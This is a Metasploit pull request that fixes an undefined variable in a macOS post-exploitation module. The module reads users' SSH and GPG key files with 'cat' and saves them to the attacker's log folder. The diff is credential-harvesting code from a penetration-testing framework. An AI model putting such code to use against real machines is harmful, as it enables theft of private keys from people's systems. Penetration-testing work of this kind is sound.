### PR TITLE
post/osx/gather/enum_osx: Fix typos

### DIFF
--- a/modules/post/osx/gather/enum_osx.rb
+++ b/modules/post/osx/gather/enum_osx.rb
@@ -213,7 +213,7 @@ class MetasploitModule < Msf::Post
             ssh_file_content = cmd_exec("/bin/cat ~/.ssh/#{k}")
 
             # Save data lo log folder
-            file_local_write(log_folder+"//#{name}",ssh_file_content)
+            file_local_write(log_folder+"//#{k.strip.gsub(/\W/,"_")}",ssh_file_content)
           end
         end
 
@@ -227,7 +227,7 @@ class MetasploitModule < Msf::Post
             gpg_file_content = cmd_exec("/bin/cat ~/.gnupg/#{k.strip}")
 
             # Save data lo log folder
-            file_local_write(log_folder+"//#{name}", gpg_file_content)
+            file_local_write(log_folder+"//#{k.strip.gsub(/\W/,"_")}", gpg_file_content)
           end
         end
       else
@@ -249,7 +249,7 @@ class MetasploitModule < Msf::Post
               ssh_file_content = cmd_exec("/bin/cat /Users/#{u}/.ssh/#{k}")
 
               # Save data lo log folder
-              file_local_write(log_folder+"//#{name}",ssh_file_content)
+              file_local_write(log_folder+"//#{k.strip.gsub(/\W/,"_")}",ssh_file_content)
             end
           end
         end
@@ -266,7 +266,7 @@ class MetasploitModule < Msf::Post
               ssh_file_content = cmd_exec("/bin/cat /Users/#{u}/.gnupg/#{k}")
 
               # Save data lo log folder
-              file_local_write(log_folder+"//#{name}",ssh_file_content)
+              file_local_write(log_folder+"//#{k.strip.gsub(/\W/,"_")}",ssh_file_content)
             end
           end
         end


### PR DESCRIPTION
Untested, but these changes can't break the module any worse than it already is.

This PR fixes four syntax errors in `post/osx/gather/enum_osx` which prevented retrieving SSH keys and GPG keys.

`name` is not defined.

These bugs have existed for 9+ years, dating back to the [oldest commit on GitHub](https://github.com/rapid7/metasploit-framework/blob/7e2fb81cb5cb0429a8d7752d80236698a48304b3/modules/post/osx/gather/enum_osx.rb), and presumably existed since Metasploit SVN.
